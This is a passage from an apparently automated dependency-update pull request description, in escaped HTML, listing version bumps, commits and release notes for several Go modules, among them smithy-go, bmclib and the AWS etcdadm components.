href=\"https://github.com/aws/eks-anywhere-packages/commit/b0bccf64eec3527271e4fa70616b39a6ff33b816\"\u003e\u003ccode\u003eb0bccf6\u003c/code\u003e\u003c/a\u003e Bump dev bundle to latest versions (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1259\"\u003e#1259\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/583ffe25a954c7b963108009cdcd24ff5cbf8047\"\u003e\u003ccode\u003e583ffe2\u003c/code\u003e\u003c/a\u003e Adds support for k8s 1.35 (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1258\"\u003e#1258\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/8c8da0328998e796b813e417ed5e720474802ff2\"\u003e\u003ccode\u003e8c8da03\u003c/code\u003e\u003c/a\u003e Update prod bundle for package release (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1257\"\u003e#1257\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/cfdc201fb58fc4c76b411a0ddeab291e82a4d0a3\"\u003e\u003ccode\u003ecfdc201\u003c/code\u003e\u003c/a\u003e fix adot regression (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1256\"\u003e#1256\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/aba2972a0d9bae8bdfc9eec8160b2d0eeef7c005\"\u003e\u003ccode\u003eaba2972\u003c/code\u003e\u003c/a\u003e Staging bundle with pkg ctlr fix (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1255\"\u003e#1255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/47ceca1fb64f400921691bd097e482bd5b881746\"\u003e\u003ccode\u003e47ceca1\u003c/code\u003e\u003c/a\u003e fix imagePullSecret schema validation (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1254\"\u003e#1254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/5c41ff81f07899eae8a27ed0cb629d28a96585f2\"\u003e\u003ccode\u003e5c41ff8\u003c/code\u003e\u003c/a\u003e Staging bundle with fixed packages (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1253\"\u003e#1253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/eks-anywhere-packages/compare/v0.4.5...v0.4.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-bootstrap-provider` from 1.0.17 to 1.0.19\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/a4b92b3f82826f1c85f473692d35e5311b04c7c4\"\u003e\u003ccode\u003ea4b92b3\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/50\"\u003e#50\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/2ee5467f5dc9940d86a4f1885e3f1612a8d1272e\"\u003e\u003ccode\u003e2ee5467\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/51\"\u003e#51\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/e288bc1b6cd8867c52ae3da79bfb153913534f19\"\u003e\u003ccode\u003ee288bc1\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcdadm bootstrap mana...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/compare/v1.0.17...v1.0.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-controller` from 1.0.25 to 1.0.27\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/6795a4f86df4078f5258a25005028c6660fc36c8\"\u003e\u003ccode\u003e6795a4f\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/75\"\u003e#75\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/72e7e5a190206423cea4519449b08a9c200971d4\"\u003e\u003ccode\u003e72e7e5a\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/74\"\u003e#74\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/d4476151cb03c0d699e5426632ff76a243ff0124\"\u003e\u003ccode\u003ed447615\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcadm controller (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/73\"\u003e#73\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-controller/compare/v1.0.25...v1.0.27\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/smithy-go` from 1.20.3 to 1.25.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/releases\"\u003egithub.com/aws/smithy-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.25.0\u003c/h2\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.22.4\u003c/h2\u003e\n\u003ch1\u003eRelease (2025-06-16)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.22.4\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fix CBOR serd empty check for string and enum fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.22.3\u003c/h2\u003e\n\u003ch1\u003eRelease (2025-02-17)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.22.3\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum Go version to 1.22 per our language support policy.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/blob/main/CHANGELOG.md\"\u003egithub.com/aws/smithy-go's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2026-04-23)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Fixed a memory leak in the LRU cache implementation used by some AWS services.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-15)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.25.0\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add support for endpointBdd trait\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-04-02)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.3\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go/aws-http-auth\u003c/code\u003e: \u003ca href=\"https://github.com/aws/smithy-go/blob/main/aws-http-auth/CHANGELOG.md#v113-2026-04-02\"\u003ev1.1.3\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBug Fix\u003c/strong\u003e: Add additional sigv4 configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2025-12-01)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/e094f45e716e33a1b950cf8bbe804790bf87f965\"\u003e\u003ccode\u003ee094f45\u003c/code\u003e\u003c/a\u003e Release 2026-04-23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/214d45be3be5188c4d2fd9cf744c21f8b3dfbabc\"\u003e\u003ccode\u003e214d45b\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3477da0b4dbf31de58ac375fe5abe5d268280824\"\u003e\u003ccode\u003e3477da0\u003c/code\u003e\u003c/a\u003e fix lrucache memory leak on existing item put (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/652\"\u003e#652\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/0d0b4d00f2430e62a790203b89fd76dceb4ae213\"\u003e\u003ccode\u003e0d0b4d0\u003c/code\u003e\u003c/a\u003e Bump Smithy version to 1.69.0 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/650\"\u003e#650\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/be5e5ef0d73560eac9d71df7995b0eaffb9a8d71\"\u003e\u003ccode\u003ebe5e5ef\u003c/code\u003e\u003c/a\u003e check \u003ca href=\"https://github.com/enum\"\u003e\u003ccode\u003e@​enum\u003c/code\u003e\u003c/a\u003e on strings for cbor (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/649\"\u003e#649\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/5beb80e9da6bcad40dc304f062c27d8269abd67d\"\u003e\u003ccode\u003e5beb80e\u003c/code\u003e\u003c/a\u003e Ensure javadoc uses utf-8 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/648\"\u003e#648\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/73bb8a7d6e222332d46eec7209ba3cd0ba520239\"\u003e\u003ccode\u003e73bb8a7\u003c/code\u003e\u003c/a\u003e Release 2026-04-15\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/f056c6fb0b43ba9bfeca6c29c8c1e1046437e45e\"\u003e\u003ccode\u003ef056c6f\u003c/code\u003e\u003c/a\u003e Changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/ee36afc3d70050ba990c8de8d65043ac11d1f9f4\"\u003e\u003ccode\u003eee36afc\u003c/code\u003e\u003c/a\u003e Implement BDD generator for \u003ca href=\"https://github.com/endpointBdd\"\u003e\u003ccode\u003e@​endpointBdd\u003c/code\u003e\u003c/a\u003e Smithy trait (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/647\"\u003e#647\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/3dbea7015f5ed79312e2a3cb6bbf39f7a26e46ea\"\u003e\u003ccode\u003e3dbea70\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/smithy-go/compare/v1.20.3...v1.25.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bmc-toolbox/bmclib/v2` from 2.1.1-0.20231206130132-1063371b9ed6 to 2.3.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bmc-toolbox/bmclib/releases\"\u003egithub.com/bmc-toolbox/bmclib/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.3.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SetBiosFromFile by \u003ca href=\"https://github.com/jakeschuurmans\"\u003e\u003ccode\u003e@​jakeschuurmans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/403\"\u003ebmc-toolbox/bmclib#403\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(mergify): upgrade configuration to current format by \u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix media mounting eject implementation: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/406\"\u003ebmc-toolbox/bmclib#406\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump golang.org/x/crypto from 0.23.0 to 0.31.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNil pointer safety by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/408\"\u003ebmc-toolbox/bmclib#408\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate dependencies: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/409\"\u003ebmc-toolbox/bmclib#409\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate virtual media ejecting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/410\"\u003ebmc-toolbox/bmclib#410\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnables support for supermicro x11ssl-f and x11scz-f by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/411\"\u003ebmc-toolbox/bmclib#411\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove virtual media ejecting and inserting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/412\"\u003ebmc-toolbox/bmclib#412\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved power state limitations from RPC provider by \u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCheck power state before issuing power off for ipmi: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/417\"\u003ebmc-toolbox/bmclib#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove sshclient package: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/420\"\u003ebmc-toolbox/bmclib#420\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mergify configuration issue: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/425\"\u003ebmc-toolbox/bmclib#425\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't use all systems when no match is found: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/422\"\u003ebmc-toolbox/bmclib#422\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Redfish] Add support for UefiHttp boot by \u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eadd \u0026quot;homeassistant\u0026quot; provider by \u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(intelamt): implement Closer interface correctly by \u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdds BMC, BIOS firmware install support for Supermicro X11SSL-F by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/431\"\u003ebmc-toolbox/bmclib#431\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: fall back to System path for VirtualMedia discovery by \u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: make SetVirtualMedia fall back on failure by \u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow specifying the Redfish system name: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/400\"\u003ebmc-toolbox/bmclib#400\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate redfish system name matching by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/401\"\u003ebmc-toolbox/bmclib#401\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eproviders/supermicro/supermicro.go: Initialize sum 'client' during serviceclient init by \u003ca href=\"https://github.com/splaspood\"\u003e\u003ccode\u003e@​splaspood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/402\"\u003ebmc-toolbox/bmclib#402\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca 